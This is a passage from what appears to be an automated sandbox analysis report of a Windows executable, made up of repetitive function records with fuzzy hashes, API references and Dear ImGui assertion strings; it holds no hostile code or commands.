                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$curr_cmd->UserCallback == 0
                                                                                  • API String ID: 3234217646-2062002702
                                                                                  • Opcode ID: 0cc4b8a48a47934f8ec9fa53a0bc143c1acf5cd054e0b1c2dca8f91046265892
                                                                                  • Instruction ID: 94c9c1d4a547f9844fb9e3be435ff40bdb5fee11bf53cba088f08e0d946bdad7
                                                                                  • Opcode Fuzzy Hash: 0cc4b8a48a47934f8ec9fa53a0bc143c1acf5cd054e0b1c2dca8f91046265892
                                                                                  • Instruction Fuzzy Hash: 02419172B16A0186DB14DF2AE48026C37A1FB98B48F552535EB4D87798DF7CD942CB80
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6AE6EEE1F
                                                                                    • Part of subcall function 00007FF6AE6F0BD0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6AE6EE49A,?,?,0000000100000000,00007FF6AE6EE548,?,?,?,?,00007FF6AE6D5FFD), ref: 00007FF6AE6F0BFF
                                                                                    • Part of subcall function 00007FF6AE6F0BD0: memcpy.VCRUNTIME140(?,?,00000000,00007FF6AE6EE49A,?,?,0000000100000000,00007FF6AE6EE548,?,?,?,?,00007FF6AE6D5FFD), ref: 00007FF6AE6F0C17
                                                                                    • Part of subcall function 00007FF6AE6F0BD0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6AE6EE49A,?,?,0000000100000000,00007FF6AE6EE548,?,?,?,?,00007FF6AE6D5FFD), ref: 00007FF6AE6F0C37
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassertfreemallocmemcpy
                                                                                  • String ID: D:\ALLLLREALSHY\src\$i >= 0 && i < Size
                                                                                  • API String ID: 3679791826-608382026
                                                                                  • Opcode ID: 72f5a4941f12df338f3565abbdb08e1a4c543f9b67a7c96ffcfbc52da9f18768
                                                                                  • Instruction ID: 4da2bbb0da21aa44f9dd27d04b967ebc9d67071f99de4bcf68e6f1cb8fbbdc82
                                                                                  • Opcode Fuzzy Hash: 72f5a4941f12df338f3565abbdb08e1a4c543f9b67a7c96ffcfbc52da9f18768
                                                                                  • Instruction Fuzzy Hash: EB31CF22709B8186DB14AF27EC546A9B764FB59B80F486035EE5987764DF3CF851CB00
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$cond == 0 || ImIsPowerOfTwo(cond)
                                                                                  • API String ID: 3234217646-1755816429
                                                                                  • Opcode ID: e20430cbc11c705ed494cd007dbd0fba53539869c348ad6e4415bcb55b5a4d12
                                                                                  • Instruction ID: 68773903083b9beb1ef8efad9c8ded18d91878d0bba18c8646d00767f6162745
                                                                                  • Opcode Fuzzy Hash: e20430cbc11c705ed494cd007dbd0fba53539869c348ad6e4415bcb55b5a4d12
                                                                                  • Instruction Fuzzy Hash: 3D41A373915AC58AD312DF3789412E877A0EF6AB48F1CA731EE146A0E5DF246091AF60
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$cond == 0 || ImIsPowerOfTwo(cond)
                                                                                  • API String ID: 3234217646-1755816429
                                                                                  • Opcode ID: f6cb89f82217310c5df0284ee568bd7c48ec3e1c368e4541a163d3a56f2b859d
                                                                                  • Instruction ID: ccf7f7062547edbf0ab4a0ec39439173a7b00546baafa0969f761cddd40e0977
                                                                                  • Opcode Fuzzy Hash: f6cb89f82217310c5df0284ee568bd7c48ec3e1c368e4541a163d3a56f2b859d
                                                                                  • Instruction Fuzzy Hash: FB31E933A1EAD585D716EB3B884137836A0EF2A744F1CA736EE49B61D0EF18E1549B10
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FF6AE6D94A9), ref: 00007FF6AE6E3344
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$window == 0 || window->RootWindow != 0
                                                                                  • API String ID: 3234217646-3048649777
                                                                                  • Opcode ID: c0b05375b1b9f3d1200db7760e2a3de4c91f40462486325914040bb151620d4a
                                                                                  • Instruction ID: 2c3b7877c5042a84907d999b344f8e76fbc33a8d3da3fee02ab498b86fc29e23
                                                                                  • Opcode Fuzzy Hash: c0b05375b1b9f3d1200db7760e2a3de4c91f40462486325914040bb151620d4a
                                                                                  • Instruction Fuzzy Hash: F231E172A5AAC2CAE765EF2795402BD66A4EB25F80F1C3435FB0CC76C8CF28A541D750
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF6AE6E3E50: _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6AE6E3ED5
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,00007FF6AE6ECABB), ref: 00007FF6AE6E472B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: (flags & ~ImGuiInputFlags_SupportedByIsKeyPressed) == 0$D:\ALLLLREALSHY\src\
                                                                                  • API String ID: 3234217646-1378627365
                                                                                  • Opcode ID: ba77c6da91090c9548a4d4e42113e5639803fd508e1aef7a30a599ace8af8a73
                                                                                  • Instruction ID: a284c6561461d959cbcdf988f22d7beb0b2a66984c13b1f5d2abe80cb1bbcaf2
                                                                                  • Opcode Fuzzy Hash: ba77c6da91090c9548a4d4e42113e5639803fd508e1aef7a30a599ace8af8a73
                                                                                  • Instruction Fuzzy Hash: 8231C831D0AA4585EA51A73B984117877A0EF67340F4BBA31F948A32F1CF3DB4449740
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6AE6F2F1C), ref: 00007FF6AE6F2A67
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$draw_cmd.ClipRect.x <= draw_cmd.ClipRect.z && draw_cmd.ClipRect.y <= draw_cmd.ClipRect.w
                                                                                  • API String ID: 3234217646-559149393
                                                                                  • Opcode ID: ad94ee347240311cf2392bd0b7d296125a6a7fccb7779dd5d4bb69ca0ce3661b
                                                                                  • Instruction ID: db95d715732a75a326a846dc9d3a8e1604371000838cf1cba3e13e88af7dd569
                                                                                  • Opcode Fuzzy Hash: ad94ee347240311cf2392bd0b7d296125a6a7fccb7779dd5d4bb69ca0ce3661b
                                                                                  • Instruction Fuzzy Hash: 4121B422A29B8986D7518B3DD4413B9B360FF69705F15F331FA4DA6261EF2DE4878B00
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: Ctx != 0$D:\ALLLLREALSHY\src\
                                                                                  • API String ID: 3234217646-4139949167
                                                                                  • Opcode ID: ccf1786611f4a097d1696aa96d0b8251ce3226e7ee6eb479ada06599680b36c7
                                                                                  • Instruction ID: 4ebb5c05392df66ebdb2912df87a6870cd847ce9162ad8ef8c2e64cf11912b60
                                                                                  • Opcode Fuzzy Hash: ccf1786611f4a097d1696aa96d0b8251ce3226e7ee6eb479ada06599680b36c7
                                                                                  • Instruction Fuzzy Hash: F4212D22919E8581E721DF26D4413B973A0FFE9708F687331F68D42555DF3CEA859700
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FF6AE6E93FC,?,?,?,?,?,00007FF6AE6E111A), ref: 00007FF6AE6E92FB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$i >= 0 && i < Size
                                                                                  • API String ID: 3234217646-608382026
                                                                                  • Opcode ID: 5431599062d32fd65eb6e708627e07df68a9ff82f83b9cf804ec125ebfa05ed6
                                                                                  • Instruction ID: 7348688afcef0712bccbad04b4c67d225a5a880d58a9c2a9b6736224deb84031
                                                                                  • Opcode Fuzzy Hash: 5431599062d32fd65eb6e708627e07df68a9ff82f83b9cf804ec125ebfa05ed6
                                                                                  • Instruction Fuzzy Hash: 2E316622D25BC996D2129B3798400A9F760FFBE745B1CE722FE14765E0DF28B4E19700
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$Size > 0
                                                                                  • API String ID: 3234217646-525454446
                                                                                  • Opcode ID: 33a866934fde98e3ad55b113b2ed48a764b823de180576423b5bbfc153d643b5
                                                                                  • Instruction ID: c5a134159ee1b43a10c1cee51180f1e7eb67d32b7763f9c84c9d74c7cf31072e
                                                                                  • Opcode Fuzzy Hash: 33a866934fde98e3ad55b113b2ed48a764b823de180576423b5bbfc153d643b5
                                                                                  • Instruction Fuzzy Hash: 89217F22A09A4682EB10FF17E44026AB760FF94BD4F542831EE4C87B69DE3CD852DB40
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: Ctx != 0$D:\ALLLLREALSHY\src\
                                                                                  • API String ID: 3234217646-4139949167
                                                                                  • Opcode ID: 970160b163eafefa01a77dd71597696c120f78c5616e424b9efd35b4f559af2f
                                                                                  • Instruction ID: cd78cbfc7bc8ca7df7abfbc77e715e18e0ea1c239aebaff854dbae75b7e88ea8
                                                                                  • Opcode Fuzzy Hash: 970160b163eafefa01a77dd71597696c120f78c5616e424b9efd35b4f559af2f
                                                                                  • Instruction Fuzzy Hash: CC213876A19E4282DB609F29E88037977B0FBD8B48F58A135E64E87799DF3CD5418F00
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$key >= 0 && key < ImGuiKey_NamedKey_END
                                                                                  • API String ID: 3234217646-4134895628
                                                                                  • Opcode ID: 16ac39032010ece17bc7c6fcfd083113f3d71cb3104a3c4f4909e0ce372164e2
                                                                                  • Instruction ID: 9510e02b88f254a7ad72556735cf2051b2102c24eb225d70f0390b3a46eab06b
                                                                                  • Opcode Fuzzy Hash: 16ac39032010ece17bc7c6fcfd083113f3d71cb3104a3c4f4909e0ce372164e2
                                                                                  • Instruction Fuzzy Hash: 5B11A711F4AB4282FBB52616E8C43792180EF79780E587836F62E869C4CF6C68845700
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: D:\ALLLLREALSHY\src\$i >= 0 && i < Size
                                                                                  • API String ID: 0-608382026
                                                                                  • Opcode ID: 8e47a441176430333626010d98ded9217d26fa6933816869e380e0a4c1eba165
                                                                                  • Instruction ID: 5026c8f2126cd3fcd24ac604b9f633f937f48210ae1d0692becaa7a4aef1fba7
                                                                                  • Opcode Fuzzy Hash: 8e47a441176430333626010d98ded9217d26fa6933816869e380e0a4c1eba165
                                                                                  • Instruction Fuzzy Hash: EE118136A09A91C5E724EF06E48066977A0F7A5B84F597531EB8E83768CF3DE841D700
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$IsNamedKey(key)
                                                                                  • API String ID: 3234217646-1256366557
                                                                                  • Opcode ID: e2bfbf03e9d0b40d4cadf47d6ac85d63b812f1525a256938d3a46b2f922467c9
                                                                                  • Instruction ID: 3d1f343a59fc637537e29a104d6cc022a44c08101ddb962b98586b51dd93e772
                                                                                  • Opcode Fuzzy Hash: e2bfbf03e9d0b40d4cadf47d6ac85d63b812f1525a256938d3a46b2f922467c9
                                                                                  • Instruction Fuzzy Hash: 0A115E98F4BE4681FFA46A07D4D43781AA1FF60350EA0743AEA0F872D0DE1DA885A705
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$Size > 0
                                                                                  • API String ID: 3234217646-525454446
                                                                                  • Opcode ID: 7cf0bd1d1954d35887c41649f08f7480bc1dec9c7362674d0f058894c14a9830
                                                                                  • Instruction ID: e20511e7f7e6fa72bf99dfdfe73cb30e01e5ddb984f6a96d253f17656a6e9c66
                                                                                  • Opcode Fuzzy Hash: 7cf0bd1d1954d35887c41649f08f7480bc1dec9c7362674d0f058894c14a9830
